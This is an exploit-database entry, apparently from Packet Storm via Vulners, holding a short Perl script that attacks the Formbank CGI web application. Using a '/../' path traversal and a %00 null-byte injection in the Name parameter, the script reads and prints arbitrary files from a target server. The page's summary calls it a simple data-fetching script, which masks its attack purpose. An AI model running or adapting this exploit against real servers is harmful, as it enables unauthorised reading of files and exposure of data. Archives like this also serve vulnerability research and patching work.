Lucene search
K

formbank19-traverse.txt

🗓️ 02 Jan 2007 00:00:00Reported by Bl0od3rType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

This Perl script contains a function to fetch and print data from a specified host and file. The script uses the LWP::Simple module and takes command line arguments for host and file

Code
`#!perl  
#found by Bl0od3r  
#visit http://dc3.dl.am   
#download:http://www.download-tipp.de/cgi-bin/jump.cgi?ID=8796  
#developer:http://www.fersch.de/formbankserver/  
use LWP::Simple;  
sub usage  
{  
die("file.pl host.com /../file.txt");  
}  
$host= $ARGV[0];  
$file= $ARGV[1];  
if (!$host) {  
die("No Host.");  
} ; if (!$file) {  
die("No File.");  
}  
getprint "http://".$host ."/cgi-bin/formbankcgi.exe/AbfrageForm?Name=".$ARGV[1]."%00";  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Jan 2007 00:00Current
7.4High risk
Vulners AI Score7.4
22